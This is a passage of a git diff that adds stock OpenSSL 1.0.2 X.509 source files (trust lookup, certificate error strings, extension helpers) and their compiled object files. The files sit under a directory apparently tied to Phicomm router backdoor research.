+            if (OBJ_obj2nid(obj) == id)
+                return X509_TRUST_REJECTED;
+        }
+    }
+    if (ax->trust) {
+        for (i = 0; i < sk_ASN1_OBJECT_num(ax->trust); i++) {
+            obj = sk_ASN1_OBJECT_value(ax->trust, i);
+            if (OBJ_obj2nid(obj) == id)
+                return X509_TRUST_TRUSTED;
+        }
+    }
+    return X509_TRUST_UNTRUSTED;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_trs.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_trs.o
new file mode 100644
index 0000000000000000000000000000000000000000..81bdcb78eeb88b99c469f504bc49f1040de2e2b4
GIT binary patch
literal 6824
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
SDK|eLUZ5wqm4zSo{Qm*tX@*e%

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_txt.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_txt.c
new file mode 100644
index 0000000..3d46d3f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_txt.c
@@ -0,0 +1,211 @@
+/* crypto/x509/x509_txt.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <time.h>
+#include <errno.h>
+
+#include "cryptlib.h"
+#include <openssl/lhash.h>
+#include <openssl/buffer.h>
+#include <openssl/evp.h>
+#include <openssl/asn1.h>
+#include <openssl/x509.h>
+#include <openssl/objects.h>
+
+const char *X509_verify_cert_error_string(long n)
+{
+    static char buf[100];
+
+    switch ((int)n) {
+    case X509_V_OK:
+        return ("ok");
+    case X509_V_ERR_UNABLE_TO_GET_ISSUER_CERT:
+        return ("unable to get issuer certificate");
+    case X509_V_ERR_UNABLE_TO_GET_CRL:
+        return ("unable to get certificate CRL");
+    case X509_V_ERR_UNABLE_TO_DECRYPT_CERT_SIGNATURE:
+        return ("unable to decrypt certificate's signature");
+    case X509_V_ERR_UNABLE_TO_DECRYPT_CRL_SIGNATURE:
+        return ("unable to decrypt CRL's signature");
+    case X509_V_ERR_UNABLE_TO_DECODE_ISSUER_PUBLIC_KEY:
+        return ("unable to decode issuer public key");
+    case X509_V_ERR_CERT_SIGNATURE_FAILURE:
+        return ("certificate signature failure");
+    case X509_V_ERR_CRL_SIGNATURE_FAILURE:
+        return ("CRL signature failure");
+    case X509_V_ERR_CERT_NOT_YET_VALID:
+        return ("certificate is not yet valid");
+    case X509_V_ERR_CRL_NOT_YET_VALID:
+        return ("CRL is not yet valid");
+    case X509_V_ERR_CERT_HAS_EXPIRED:
+        return ("certificate has expired");
+    case X509_V_ERR_CRL_HAS_EXPIRED:
+        return ("CRL has expired");
+    case X509_V_ERR_ERROR_IN_CERT_NOT_BEFORE_FIELD:
+        return ("format error in certificate's notBefore field");
+    case X509_V_ERR_ERROR_IN_CERT_NOT_AFTER_FIELD:
+        return ("format error in certificate's notAfter field");
+    case X509_V_ERR_ERROR_IN_CRL_LAST_UPDATE_FIELD:
+        return ("format error in CRL's lastUpdate field");
+    case X509_V_ERR_ERROR_IN_CRL_NEXT_UPDATE_FIELD:
+        return ("format error in CRL's nextUpdate field");
+    case X509_V_ERR_OUT_OF_MEM:
+        return ("out of memory");
+    case X509_V_ERR_DEPTH_ZERO_SELF_SIGNED_CERT:
+        return ("self signed certificate");
+    case X509_V_ERR_SELF_SIGNED_CERT_IN_CHAIN:
+        return ("self signed certificate in certificate chain");
+    case X509_V_ERR_UNABLE_TO_GET_ISSUER_CERT_LOCALLY:
+        return ("unable to get local issuer certificate");
+    case X509_V_ERR_UNABLE_TO_VERIFY_LEAF_SIGNATURE:
+        return ("unable to verify the first certificate");
+    case X509_V_ERR_CERT_CHAIN_TOO_LONG:
+        return ("certificate chain too long");
+    case X509_V_ERR_CERT_REVOKED:
+        return ("certificate revoked");
+    case X509_V_ERR_INVALID_CA:
+        return ("invalid CA certificate");
+    case X509_V_ERR_INVALID_NON_CA:
+        return ("invalid non-CA certificate (has CA markings)");
+    case X509_V_ERR_PATH_LENGTH_EXCEEDED:
+        return ("path length constraint exceeded");
+    case X509_V_ERR_PROXY_PATH_LENGTH_EXCEEDED:
+        return ("proxy path length constraint exceeded");
+    case X509_V_ERR_PROXY_CERTIFICATES_NOT_ALLOWED:
+        return
+            ("proxy certificates not allowed, please set the appropriate flag");
+    case X509_V_ERR_INVALID_PURPOSE:
+        return ("unsupported certificate purpose");
+    case X509_V_ERR_CERT_UNTRUSTED:
+        return ("certificate not trusted");
+    case X509_V_ERR_CERT_REJECTED:
+        return ("certificate rejected");
+    case X509_V_ERR_APPLICATION_VERIFICATION:
+        return ("application verification failure");
+    case X509_V_ERR_SUBJECT_ISSUER_MISMATCH:
+        return ("subject issuer mismatch");
+    case X509_V_ERR_AKID_SKID_MISMATCH:
+        return ("authority and subject key identifier mismatch");
+    case X509_V_ERR_AKID_ISSUER_SERIAL_MISMATCH:
+        return ("authority and issuer serial number mismatch");
+    case X509_V_ERR_KEYUSAGE_NO_CERTSIGN:
+        return ("key usage does not include certificate signing");
+    case X509_V_ERR_UNABLE_TO_GET_CRL_ISSUER:
+        return ("unable to get CRL issuer certificate");
+    case X509_V_ERR_UNHANDLED_CRITICAL_EXTENSION:
+        return ("unhandled critical extension");
+    case X509_V_ERR_KEYUSAGE_NO_CRL_SIGN:
+        return ("key usage does not include CRL signing");
+    case X509_V_ERR_KEYUSAGE_NO_DIGITAL_SIGNATURE:
+        return ("key usage does not include digital signature");
+    case X509_V_ERR_UNHANDLED_CRITICAL_CRL_EXTENSION:
+        return ("unhandled critical CRL extension");
+    case X509_V_ERR_INVALID_EXTENSION:
+        return ("invalid or inconsistent certificate extension");
+    case X509_V_ERR_INVALID_POLICY_EXTENSION:
+        return ("invalid or inconsistent certificate policy extension");
+    case X509_V_ERR_NO_EXPLICIT_POLICY:
+        return ("no explicit policy");
+    case X509_V_ERR_DIFFERENT_CRL_SCOPE:
+        return ("Different CRL scope");
+    case X509_V_ERR_UNSUPPORTED_EXTENSION_FEATURE:
+        return ("Unsupported extension feature");
+    case X509_V_ERR_UNNESTED_RESOURCE:
+        return ("RFC 3779 resource not subset of parent's resources");
+
+    case X509_V_ERR_PERMITTED_VIOLATION:
+        return ("permitted subtree violation");
+    case X509_V_ERR_EXCLUDED_VIOLATION:
+        return ("excluded subtree violation");
+    case X509_V_ERR_SUBTREE_MINMAX:
+        return ("name constraints minimum and maximum not supported");
+    case X509_V_ERR_UNSUPPORTED_CONSTRAINT_TYPE:
+        return ("unsupported name constraint type");
+    case X509_V_ERR_UNSUPPORTED_CONSTRAINT_SYNTAX:
+        return ("unsupported or invalid name constraint syntax");
+    case X509_V_ERR_UNSUPPORTED_NAME_SYNTAX:
+        return ("unsupported or invalid name syntax");
+    case X509_V_ERR_CRL_PATH_VALIDATION_ERROR:
+        return ("CRL path validation error");
+
+    case X509_V_ERR_SUITE_B_INVALID_VERSION:
+        return ("Suite B: certificate version invalid");
+    case X509_V_ERR_SUITE_B_INVALID_ALGORITHM:
+        return ("Suite B: invalid public key algorithm");
+    case X509_V_ERR_SUITE_B_INVALID_CURVE:
+        return ("Suite B: invalid ECC curve");
+    case X509_V_ERR_SUITE_B_INVALID_SIGNATURE_ALGORITHM:
+        return ("Suite B: invalid signature algorithm");
+    case X509_V_ERR_SUITE_B_LOS_NOT_ALLOWED:
+        return ("Suite B: curve not allowed for this LOS");
+    case X509_V_ERR_SUITE_B_CANNOT_SIGN_P_384_WITH_P_256:
+        return ("Suite B: cannot sign P-384 with P-256");
+
+    case X509_V_ERR_HOSTNAME_MISMATCH:
+        return ("Hostname mismatch");
+    case X509_V_ERR_EMAIL_MISMATCH:
+        return ("Email address mismatch");
+    case X509_V_ERR_IP_ADDRESS_MISMATCH:
+        return ("IP address mismatch");
+
+    default:
+        BIO_snprintf(buf, sizeof buf, "error number %ld", n);
+        return (buf);
+    }
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_txt.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_txt.o
new file mode 100644
index 0000000000000000000000000000000000000000..9a6a8a5f3e04bafe5958b7d989e6df47272c0fae
GIT binary patch
literal 9880
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_v3.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_v3.c
new file mode 100644
index 0000000..4a03445
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509/x509_v3.c
@@ -0,0 +1,284 @@
+/* crypto/x509/x509_v3.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <openssl/stack.h>
+#include "cryptlib.h"
+#include <openssl/asn1.h>
+#include <openssl/objects.h>
+#include <openssl/evp.h>
+#include <openssl/x509.h>
+#include <openssl/x509v3.h>
+
+int X509v3_get_ext_count(const STACK_OF(X509_EXTENSION) *x)
+{
+    if (x == NULL)
+        return (0);
+    return (sk_X509_EXTENSION_num(x));
+}
+
+int X509v3_get_ext_by_NID(const STACK_OF(X509_EXTENSION) *x, int nid,
+                          int lastpos)
+{
+    ASN1_OBJECT *obj;
+
+    obj = OBJ_nid2obj(nid);
+    if (obj == NULL)
+        return (-2);
+    return (X509v3_get_ext_by_OBJ(x, obj, lastpos));
+}
+
+int X509v3_get_ext_by_OBJ(const STACK_OF(X509_EXTENSION) *sk,
+                          ASN1_OBJECT *obj, int lastpos)
+{
+    int n;
+    X509_EXTENSION *ex;
+
+    if (sk == NULL)
+        return (-1);
+    lastpos++;
+    if (lastpos < 0)
